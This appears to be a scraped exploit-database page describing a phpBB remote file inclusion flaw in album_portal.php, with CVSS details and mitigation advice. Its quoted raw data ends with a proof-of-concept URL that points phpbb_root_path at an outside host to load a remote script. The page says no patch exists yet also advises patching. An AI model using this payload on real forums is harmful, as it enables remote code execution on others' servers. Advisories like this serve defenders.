header-logo
Suggest Exploit
vendor:
phpBB
by:
Unknown
7.5
CVSS
HIGH
File Inclusion
98
CWE
Product Name: phpBB
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:phpbb_group:phpbb
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

phpBB File Include Vulnerability

The phpBB application is prone to a file include vulnerability that can be exploited by remote attackers. This vulnerability allows attackers to include a remote malicious script to be executed on a vulnerable system.

Mitigation:

Apply the latest security patches and updates for phpBB to prevent this vulnerability. Additionally, restrict access to the affected application and ensure that it is not accessible from untrusted networks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10177/info

It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system.

http://www.example.com/album_portal.php?phpbb_root_path=http://www.example.com/&phpEx=/../../[example.php]